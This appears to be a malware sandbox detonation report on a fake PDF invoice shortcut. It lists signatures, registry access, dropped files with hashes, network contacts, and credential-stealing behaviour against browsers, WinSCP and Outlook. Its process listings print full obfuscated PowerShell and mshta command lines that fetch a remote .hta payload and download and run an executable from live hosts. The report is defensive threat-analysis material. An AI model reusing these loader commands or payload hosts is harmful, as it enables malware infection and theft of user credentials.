memory/3720-149-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp
memory/3720-152-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp
memory/3720-156-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp
memory/3720-157-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp
memory/3720-158-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp
memory/3720-162-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-14 20:00
Reported
2024-11-14 20:02
Platform
win10v2004-20241007-en
Max time kernel
123s
Max time network
153s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{33B1467D-4775-467B-A87A-71D191D36DAE}\.cr\EXBRRVQT.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
Loads dropped DLL
Reads WinSCP keys stored on the system
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1676 set thread context of 804 | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | C:\Windows\SysWOW64\cmd.exe |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{33B1467D-4775-467B-A87A-71D191D36DAE}\.cr\EXBRRVQT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Rechnung_2024_0094.pdf.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $a='48aAs.69edS3b/:15u2vtmrpL0-7h'; &(-join($a[(-648+652),(169-167),(990-966)])) ^[ (-join($a[(-648+652),(169-167),(990-966)])); ^[ /# (-join($a[(-476+497),(-648+652),(-158+186),(-824+844),(169-167)])); foreach($z in @((-105+133),(-426+446),(575-555),(173-150),(-217+221),(-509+523),(524-511),(711-698),(210-187),(-471+488),(-724+736),(-668+694),(-606+622),(-351+363),(906-899),(-719+737),(899-881),(166-155),(387-375),(-188+203),(-604+616),(783-776),(-378+386),(775-748),(660-660),(995-993),(803-776),(-863+888),(-920+932),(333-325),(994-976),(559-541),(700-698),(835-810),(-958+959),(425-410),(-411+417),(686-684),(-963+964),(569-557),(934-907),(861-853),(-724+726),(950-941),(494-489),(-470+492),(-789+807),(805-800),(-232+241),(-603+611),(1008-989),(-242+255),(-653+668),(-705+723),(580-569),(-536+541),(986-958),(736-716),(-368+370))){$m+=$a[$z]}; /# $m;
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev/123.hta
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hQzEzFacg($guorUJ, $OIoEigYq){[IO.File]::WriteAllBytes($guorUJ, $OIoEigYq)};function uuuOHRemK($guorUJ){if($guorUJ.EndsWith((ijnaJnaV @(5036,5090,5098,5098))) -eq $True){Start-Process (ijnaJnaV @(5104,5107,5100,5090,5098,5098,5041,5040,5036,5091,5110,5091)) $guorUJ}else{Start-Process $guorUJ}};function xlptFHdqR($FSYzd){$EBqZdo = New-Object (ijnaJnaV @(5068,5091,5106,5036,5077,5091,5088,5057,5098,5095,5091,5100,5106));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OIoEigYq = $EBqZdo.DownloadData($FSYzd);return $OIoEigYq};function ijnaJnaV($UxikGUX){$MKUYRJP=4990;$VRwScE=$Null;foreach($NymBWJi in $UxikGUX){$VRwScE+=[char]($NymBWJi-$MKUYRJP)};return $VRwScE};function TQiKbyGz(){$vXhNEzkB = $env:APPDATA + '\';$WRrNymqB = xlptFHdqR (ijnaJnaV @(5094,5106,5106,5102,5105,5048,5037,5037,5102,5107,5088,5035,5043,5088,5047,5040,5040,5041,5088,5039,5088,5047,5091,5045,5042,5087,5045,5038,5088,5091,5040,5040,5087,5038,5046,5039,5044,5087,5046,5088,5045,5091,5087,5090,5036,5104,5040,5036,5090,5091,5108,5037,5059,5078,5056,5072,5072,5076,5071,5074,5036,5091,5110,5091));$AvKehPB = $vXhNEzkB + 'EXBRRVQT.exe';hQzEzFacg $AvKehPB $WRrNymqB;uuuOHRemK $AvKehPB;;;;}TQiKbyGz;
C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe
"C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe"
C:\Windows\Temp\{33B1467D-4775-467B-A87A-71D191D36DAE}\.cr\EXBRRVQT.exe
"C:\Windows\Temp\{33B1467D-4775-467B-A87A-71D191D36DAE}\.cr\EXBRRVQT.exe" -burn.clean.room="C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe" -burn.filehandle.attached=540 -burn.filehandle.self=548
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\ActiveISO.exe
"C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\ActiveISO.exe"
C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | udp |
| US | 172.66.0.235:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.0.66.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.21.192.23.in-addr.arpa | udp |
| US | 172.66.0.235:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sirnisirlo.online | udp |
| US | 172.67.214.86:443 | sirnisirlo.online | tcp |
| US | 8.8.8.8:53 | 86.214.67.172.in-addr.arpa | udp |
Files
memory/3724-2-0x00007FFC5D9F3000-0x00007FFC5D9F5000-memory.dmp
memory/3724-3-0x000001CA63260000-0x000001CA63282000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_okti2ygx.aj5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3724-13-0x00007FFC5D9F0000-0x00007FFC5E4B1000-memory.dmp
memory/3724-14-0x00007FFC5D9F0000-0x00007FFC5E4B1000-memory.dmp
memory/3724-18-0x00007FFC5D9F0000-0x00007FFC5E4B1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 66898dbf1d1f32af63256328731f2c9e |
| SHA1 | 21f5828b21fae6d81e57a11e113440c95e1752de |
| SHA256 | 258ea4ccbc181f6b86d3a819981d9cf526950f1aa7517b12cda14b856aad8c90 |
| SHA512 | 65ab1f1224ba418a733b6fe9aecead3c97cb92bf236ffddd77ab70361d81d3d02c24e45c7db1019724d52a0556e2248ed23f696cb49b970efce0bba1666b5e94 |
C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe
| MD5 | b6ab13b3b9903bf84327737ba227bab3 |
| SHA1 | 65dff8665b502ba33f3effb8430263e4f906c1c0 |
| SHA256 | baa56e574d8deed445d0e58487add9d429d60bbb1b39943c581bcf50e9bd91d6 |
| SHA512 | 6f6ec1217e14f96a52cfa314327a09bfe74199fa0a85d94f0bd5381a0af7c96ac26ba8b5506663f76473c0714609c80d58cb86bde73888cfd6ea15060793f5c7 |
C:\Windows\Temp\{33B1467D-4775-467B-A87A-71D191D36DAE}\.cr\EXBRRVQT.exe
| MD5 | eb26dfa5e4e3170d90b5629df0715aa9 |
| SHA1 | bbc10367aa29aa36a6e53c63b60a6936bc6f1720 |
| SHA256 | 70721a20760818839c7ef0ce2d684666bd07bbb79b87415944c6efbce58f7906 |
| SHA512 | 11e2683c8f47c62548050f863386e62908c5dd7e456ca13c22644ecb984533d3abdd72d1fd5a3ac53c1b2734e5999554d383f3f5c615d4c94c4c169664787bf9 |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\Helicoid.dll
| MD5 | a9c5977784daf8cebe8408a8b6db3fbe |
| SHA1 | 8ae8d67007cdca9acf96681ffa6200e5847972de |
| SHA256 | 63f5a34563b62de3dffa57401d7225f4687933cef250b78b995eee813c862fad |
| SHA512 | 886fbea2c959ce4245185d1dcec3efcfbb50a71840c964d4fd8e0a46f7fbf8afbf7445bc2d892789f25124b862912fb0c3556c5004a7e6ddb4ee13b87cf58a65 |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\ActiveISO.exe
| MD5 | b84dfabe933d1160f624693d94779ce5 |
| SHA1 | ac0133c09708fe4a3c626e3ba4cdf44d3a0e065f |
| SHA256 | 588cb61b36a001384a2833bd5df8d7982ca79d6ae17a3d83a94e01b1e79684bd |
| SHA512 | eeaeef8d6b5fa02dedf9818babaa4b5ffdb87300521883aa290289dcc720b3d543279085ed3fc649b74654143e678502e56eb3f92c4baf53c075977de33c1b0e |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\vcruntime140_1.dll
| MD5 | 75e78e4bf561031d39f86143753400ff |
| SHA1 | 324c2a99e39f8992459495182677e91656a05206 |
| SHA256 | 1758085a61527b427c4380f0c976d29a8bee889f2ac480c356a3f166433bf70e |
| SHA512 | ce4daf46bce44a89d21308c63e2de8b757a23be2630360209c4a25eb13f1f66a04fbb0a124761a33bbf34496f2f2a02b8df159b4b62f1b6241e1dbfb0e5d9756 |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\vcruntime140.dll
| MD5 | f12681a472b9dd04a812e16096514974 |
| SHA1 | 6fd102eb3e0b0e6eef08118d71f28702d1a9067c |
| SHA256 | d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8 |
| SHA512 | 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2 |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\msvcp140.dll
| MD5 | 7db24201efea565d930b7ec3306f4308 |
| SHA1 | 880c8034b1655597d0eebe056719a6f79b60e03c |
| SHA256 | 72fe4598f0b75d31ce2dc621e8ef161338c6450bb017cd06895745690603729e |
| SHA512 | bac5729a3eb53e9bc7b680671d028cabef5ea102dfaa48a7c453b67f8ecb358db9f8fb16b3b1d9ea5a2dff34f459f6ac87f3a563c736d81d31048766198ff11e |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\Qt5Core.dll
| MD5 | 8c735052a2d4e9b01b0e028f0c20f67c |
| SHA1 | b72bde11de3310a495dd16520362f4adbf21717a |
| SHA256 | d751ab0357f71586b1793ce4166295aba085334647d6e3ffcd49287a801273e7 |
| SHA512 | 0bbd920e1b48361c7f3e1540ddb12fa6c9146bfe36e13eba2b2e6ca8bf3ad961d88121c6f70eca6d9ea413900455e696f7233c5bb54415ca7d2c9c1c0d4c1fb3 |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\Qt5Network.dll
| MD5 | fe5ed4c5da03077f98c3efa91ecefd81 |
| SHA1 | e23e839ec0602662788f761ebe7dd4b39c018a7f |
| SHA256 | d992aaeb21cb567113126c2912cf75e892c8e3ead5d50147a11abe704b9e2e2b |
| SHA512 | 22514732a0edf8fc2b8770139599132429080b86d2844143d21bb834cbddaaa077d763969960e39e2050a69493c1aae191600e5df6107bde90fae589a054f071 |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\Qt5Gui.dll
| MD5 | 34893cb3d9a2250f0edecd68aedb72c7 |
| SHA1 | 37161412df2c1313a54749fe6f33e4dbf41d128a |
| SHA256 | ca8334b2e63bc01f0749afeb9e87943c29882131efe58608ea25732961b2df34 |
| SHA512 | 484e32832d69ec1799bd1bcc694418801c443c732ed59ecd76b3f67abf0b1c97d64ae123728dfa99013df846ba45be310502ef6f8da42155da2e89f2a1e8cb2c |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\Qt5Widgets.dll
| MD5 | c502bb8a4a7dc3724ab09292cd3c70d6 |
| SHA1 | ff44fddeec2d335ec0eaa861714b561f899675fd |
| SHA256 | 4266918226c680789d49cf2407a7fec012b0ed872adafb84c7719e645f9b2e6d |
| SHA512 | 73bef89503ce032fba278876b7dab9eac275632df7a72c77093d433c932272da997e8fbeb431a09d84baac7b2ab2e55222ff687893311949a5603e738bfa6617 |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\Qt5PrintSupport.dll
| MD5 | d0634933db2745397a603d5976bee8e7 |
| SHA1 | ddec98433bcfec1d9e38557d803bc73e1ff883b6 |
| SHA256 | 7d91d3d341dbba568e2d19382e9d58a42a0d78064c3ad7adfe3c7bb14742c2b1 |
| SHA512 | 9271370cd22115f68bd62572640525e086a05d75f5bc768f06e20b90b48a182f29a658a07099c7bc1e99bf0ffcf1229709524e2af6745d6fed7b41c1addd09f1 |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\StarBurn.dll
| MD5 | 41e19ba2364f2c834b2487e1d02bb99a |
| SHA1 | 6c61d603dddfe384a93ad33775b70681d0a396d9 |
| SHA256 | c040a25377028b0c28db81a012de786c803a0e9d6f87ce460335a621d31f5340 |
| SHA512 | 6ebf4a9e80f16c6a03ff357d2da9a34a4227bfd65eb66d1d335349a77ba066d069ba0d47d46229b3c77b59052c42d388678662f970b418d8cc3cfb1223427d8c |
memory/3736-89-0x00007FFC5C970000-0x00007FFC5CEBE000-memory.dmp
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\vechpt
| MD5 | dd899ca13e5bef55bcea07e167da891b |
| SHA1 | e883f0240f127520486f063b033fb34fa2dfe5c1 |
| SHA256 | a818d6fa8caddaa608345ea40b75073a7c98637161794918566e2ddeeede47e7 |
| SHA512 | e38437899fcc433ef89a04c6a68684ea5110181af48a4699836939cf167d0c1fe7932432518445e90acbcbc151ee324d77de064147d97fdedf6ecabaac788c06 |
C:\Windows\Temp\{24B2EFBD-0BAF-4CA0-9790-E6693C8CECE5}\.ba\dcfa
| MD5 | 456596683dad1217c76d8c0f47b5cfbc |
| SHA1 | 001ae3f937aa75ad2175289c6e8f09561a1cbb35 |
| SHA256 | a7e578d0f7a5d522e4b4e62864f77cbb1830dc7e7026c9ee0b5f6fa7156c727f |
| SHA512 | 537420007a4985f2deb4b2a48af1ba61cf8cc112359ec1cdbd02dfb8e958ab5ab4ec302cd0698a14d4560afe6c23627d1d4d080eac9daa7cb5edc7259cb73591 |
C:\Users\Admin\AppData\Local\Temp\78be679f
| MD5 | 2e7e4ea8ff444581c44338bfaa078491 |
| SHA1 | 0f16db2b5e3d420297da074ac82116b44fda05e3 |
| SHA256 | 7165887290c68c5933254756130722622bc2e7c496a7a1b1d3ca8b43bbec946d |
| SHA512 | b5e9621dd0cf474c650afcdccf9b7b5bffb7e850d4eab2871febe2a0a9a547af9f31be6386fb43f96b3248cce5273dc8d10e96a3365aae2a2d04f1836d703124 |
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
| MD5 | 967f4470627f823f4d7981e511c9824f |
| SHA1 | 416501b096df80ddc49f4144c3832cf2cadb9cb2 |
| SHA256 | b22bf1210b5fd173a210ebfa9092390aa0513c41e1914cbe161eb547f049ef91 |
| SHA512 | 8883ead428c9d4b415046de9f8398aa1f65ae81fe7945a840c822620e18f6f9930cce2e10acff3b5da8b9c817ade3dabc1de576cbd255087267f77341900a41c |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 20:00
Reported
2024-11-14 20:02
Platform
win7-20240729-en
Max time kernel
35s
Max time network
130s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Windows\system32\mshta.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = … | C:\Windows\system32\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Rechnung_2024_0091.pdf.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $a='48aAs.69edS3b/:15u2vtmrpL0-7h'; &(-join($a[(-648+652),(169-167),(990-966)])) ^[ (-join($a[(-648+652),(169-167),(990-966)])); ^[ /# (-join($a[(-476+497),(-648+652),(-158+186),(-824+844),(169-167)])); foreach($z in @((-105+133),(-426+446),(575-555),(173-150),(-217+221),(-509+523),(524-511),(711-698),(210-187),(-471+488),(-724+736),(-668+694),(-606+622),(-351+363),(906-899),(-719+737),(899-881),(166-155),(387-375),(-188+203),(-604+616),(783-776),(-378+386),(775-748),(660-660),(995-993),(803-776),(-863+888),(-920+932),(333-325),(994-976),(559-541),(700-698),(835-810),(-958+959),(425-410),(-411+417),(686-684),(-963+964),(569-557),(934-907),(861-853),(-724+726),(950-941),(494-489),(-470+492),(-789+807),(805-800),(-232+241),(-603+611),(1008-989),(-242+255),(-653+668),(-705+723),(580-569),(-536+541),(986-958),(736-716),(-368+370))){$m+=$a[$z]}; /# $m;
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev/123.hta
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hQzEzFacg($guorUJ, $OIoEigYq){[IO.File]::WriteAllBytes($guorUJ, $OIoEigYq)};function uuuOHRemK($guorUJ){if($guorUJ.EndsWith((ijnaJnaV @(5036,5090,5098,5098))) -eq $True){Start-Process (ijnaJnaV @(5104,5107,5100,5090,5098,5098,5041,5040,5036,5091,5110,5091)) $guorUJ}else{Start-Process $guorUJ}};function xlptFHdqR($FSYzd){$EBqZdo = New-Object (ijnaJnaV @(5068,5091,5106,5036,5077,5091,5088,5057,5098,5095,5091,5100,5106));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OIoEigYq = $EBqZdo.DownloadData($FSYzd);return $OIoEigYq};function ijnaJnaV($UxikGUX){$MKUYRJP=4990;$VRwScE=$Null;foreach($NymBWJi in $UxikGUX){$VRwScE+=[char]($NymBWJi-$MKUYRJP)};return $VRwScE};function TQiKbyGz(){$vXhNEzkB = $env:APPDATA + '\';$WRrNymqB = xlptFHdqR (ijnaJnaV @(5094,5106,5106,5102,5105,5048,5037,5037,5102,5107,5088,5035,5043,5088,5047,5040,5040,5041,5088,5039,5088,5047,5091,5045,5042,5087,5045,5038,5088,5091,5040,5040,5087,5038,5046,5039,5044,5087,5046,5088,5045,5091,5087,5090,5036,5104,5040,5036,5090,5091,5108,5037,5059,5078,5056,5072,5072,5076,5071,5074,5036,5091,5110,5091));$AvKehPB = $vXhNEzkB + 'EXBRRVQT.exe';hQzEzFacg $AvKehPB $WRrNymqB;uuuOHRemK $AvKehPB;;;;}TQiKbyGz;
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | udp |
| US | 172.66.0.235:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 172.66.0.235:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 23.192.22.93:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.252.143:80 | crl.microsoft.com | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-14 20:00
Reported
2024-11-14 20:02
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{B1C17772-51E1-4EA9-9894-03A754292AA2}\.cr\EXBRRVQT.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
Loads dropped DLL
Reads WinSCP keys stored on the system
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
